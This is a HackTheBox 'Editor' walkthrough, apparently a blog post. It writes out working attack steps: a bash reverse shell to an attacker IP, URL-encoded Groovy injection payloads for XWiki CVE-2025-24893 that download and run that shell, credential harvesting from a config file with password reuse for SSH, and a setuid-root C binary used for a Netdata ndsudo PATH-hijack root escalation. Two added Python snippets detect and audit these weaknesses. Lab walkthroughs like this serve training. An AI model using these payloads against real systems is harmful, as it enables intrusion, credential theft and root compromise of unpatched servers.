HackTheBox Editor Walkthrough


This was an easy Linux machine, nothing much to it.
Initial Enumeration
- So first I did an nmap scan and found 3 open ports and a domain, editor.htb, which you can add to your /etc/hosts:
sudo nano /etc/hosts
<MACHINE_IP> editor.htb
- When I went to the website, at first look it looked like a code editor.
- Then when I went to port 8080 I saw it is running an open source wiki platform, XWiki.
Foothold and user.txt
Another thing visible on the page was the version, 15.10.8.
Then I googled the version and found it is vulnerable; its CVE is CVE-2025-24893.
Then I googled CVE-2025-24893 for a shell but I didn't find any scripts for that; most scripts only tell you that the website is vulnerable to CVE-2025-24893.
Then I stumbled across this GitHub link https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py which helped me to exploit it and get a shell. To exploit it we first need to create a shell.sh script, then upload it to the website, then run it. Below are the commands for it:
└─$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1
- After creating shell.sh, start a Python web server on your local machine:
└─$ python -m http.server 80
- Then paste the following into the browser and press Enter; make sure to change <YOUR_IP>:
http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln("wget%20-qO%20/tmp/shell.sh%20http://<YOUR_IP>/shell.sh".execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
- With this you have uploaded the shell; now, to run it and get a shell, start a listener and request the second URL:
nc -lnvp 4444 # on your local machine
http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22bash%20/tmp/shell.sh%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
- With this we get a shell as xwiki:
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.xx.xx.xx] 57484
bash: cannot set terminal process group (1129): Inappropriate ioctl for device
bash: no job control in this shell
xwiki@editor:/usr/lib/xwiki-jetty$ whoami
whoami
xwiki
xwiki@editor:/usr/lib/xwiki-jetty$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
Here in the /etc/passwd output we can see that the user with a /home directory and a login shell is oliver. During your enumeration, look at this file:
/usr/lib/xwiki/WEB-INF/hibernate.cfg.xml
xwiki@editor:/usr/lib/xwiki$ cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password
cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password"></property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password"></property>
- In this file you will find the database password, which is reused as the SSH password of user oliver:
theEd1t0rTeam99
ssh oliver@editor.htb
- Then enter the password and you will get a shell as oliver, whose home directory has user.txt.
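As an added example (my own code, not part of the original walkthrough or the exploit script linked above), here is a small defensive check for the foothold used above: it parses web-server access-log lines, decodes the `text` parameter of requests to the SolrSearch page, and flags the `{{async}}`/`{{groovy}}` macro markers those two URLs rely on. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (no real hosts): a normal search, an injection attempt, an unrelated page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /xwiki/bin/view/Main/SolrSearch?text=hello+world HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2025:10:00:05 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22id%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2025:10:00:09 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 9000
"""

# Combined/common log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Wiki-syntax macro openers/closers that have no business inside a search string.
MACRO_RE = re.compile(r"\{\{\s*/?(async|groovy|velocity|python|script)\b", re.IGNORECASE)


def decode_text_param(target: str) -> str:
    """Return the decoded `text` query value of a request target, or '' if absent."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("text", [])
    # parse_qs percent-decodes once; decode again so a double-encoded payload is not missed.
    return unquote(values[0]) if values else ""


def find_injection_attempts(log_text: str) -> list:
    """Return SolrSearch requests whose `text` parameter carries macro markers."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not urlsplit(m.group("target")).path.endswith("/SolrSearch"):
            continue
        text = decode_text_param(m.group("target"))
        macros = MACRO_RE.findall(text)
        if macros:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
                         "macros": sorted({x.lower() for x in macros}), "payload": text})
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} macros={hit['macros']}")
```

A 200 status on a flagged request is the case to escalate, since the page above returns the macro output in the RSS body.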
Privilege Escalation and root.txt
- First I ran sudo -l but it got me nothing:
oliver@editor:~$ sudo -l
[sudo] password for oliver:
Sorry, user oliver may not run sudo on editor.
- Then I ran ss -tulnp to list the listening sockets:
oliver@editor:~$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.1:8125 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:44303 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8125 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:19999 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 50 [::ffff:127.0.0.1]:8079 *:*
tcp LISTEN 0 50 *:8080 *:*
On port 19999 we see a service running: Netdata.
So I did port forwarding to see what I could do with this service.
To port forward, use the command below and open http://localhost:19999 in your browser:
ssh -L 19999:127.0.0.1:19999 oliver@editor.htb
- When you click on the red banner that tells us to update the version, it shows the current version.
This shows that the current version of the Netdata service is 1.45.2 and we need to update it.
Then I googled to find out whether this version is vulnerable, and indeed it is; the CVE is CVE-2024-32019.
- PoC (from the advisory):
- Place an executable with a name that is on ndsudo's list of commands (e.g. nvme) in a writable path.
- Set the PATH environment variable so that it contains this path.
- Run ndsudo with a command that will run the aforementioned executable.
- So first we create malicious.c and compile it:
└─$ cat malicious.c
// malicious.c
#include <unistd.h>
#include <stdlib.h>
int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-i", NULL);
    return 0;
}
└─$ gcc -o nvme malicious.c
- Then we upload this to the /tmp directory. To upload it we first need to start a Python web server on the local machine, in the directory where we have our executable nvme:
└─$ python -m http.server 80
- Then execute the following commands in oliver's shell:
cd /tmp
wget http://<YOUR_IP>/nvme
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
root@editor:/tmp# whoami
root
root@editor:/tmp# cd /root/
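As an added example (my own code, not Netdata's and not from the walkthrough), here is an audit of the weakness the PoC above abuses: a root-privileged helper that resolves a command name such as nvme through the caller's PATH. It resolves the name the way an unhardened helper would and reports why that match must not run as root; the trusted-directory list is an assumption, and the fixture builds a fake nvme in a world-writable temp directory placed first in PATH, as the steps above do with /tmp.

```python
import os
import stat
import tempfile
from typing import List, Optional

# Directories a root-privileged helper should be confined to (an assumption for this example).
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")

def resolve_like_path(name: str, path_value: str) -> Optional[str]:
    """First executable called `name` along PATH, i.e. what an unhardened helper would run."""
    for d in path_value.split(os.pathsep):
        candidate = os.path.join(d, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def trust_problems(path: str) -> List[str]:
    """Reasons the resolved binary must not be executed with root privileges (empty = acceptable)."""
    problems = []
    d = os.path.dirname(path)
    if d not in TRUSTED_DIRS:
        problems.append(f"directory {d} is not in the trusted list")
    for p, label in ((d, "directory"), (path, "file")):
        st = os.stat(p)
        if st.st_uid != 0:
            problems.append(f"{label} {p} is not owned by root")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append(f"{label} {p} is group- or world-writable")
    return problems

def audit_command(name: str, path_value: str) -> List[str]:
    """Problems with where the caller's PATH would make a helper run `name` (empty list = acceptable)."""
    found = resolve_like_path(name, path_value)
    return ["not found on PATH"] if found is None else trust_problems(found)

def demo_hijacked_path() -> List[str]:
    """Constructed fixture mirroring the walkthrough: a fake `nvme` in a world-writable dir put first in PATH."""
    scratch = tempfile.mkdtemp()
    os.chmod(scratch, 0o1777)  # same mode as /tmp: sticky and world-writable
    fake = os.path.join(scratch, "nvme")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho placeholder\n")  # harmless stand-in; never executed here
    os.chmod(fake, 0o755)
    return audit_command("nvme", scratch + os.pathsep + "/usr/bin")

if __name__ == "__main__":
    print(demo_hijacked_path() or ["ok"])
```

The fix for this class of bug is to ignore the caller's PATH entirely and search only the trusted directories, applying the same ownership and permission checks before executing.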
That is it for the machine. Hope you enjoyed solving it.
Thanks for reading the walkthrough. Hope you liked it! Do leave a comment for feedback or queries!
Written by insidepwn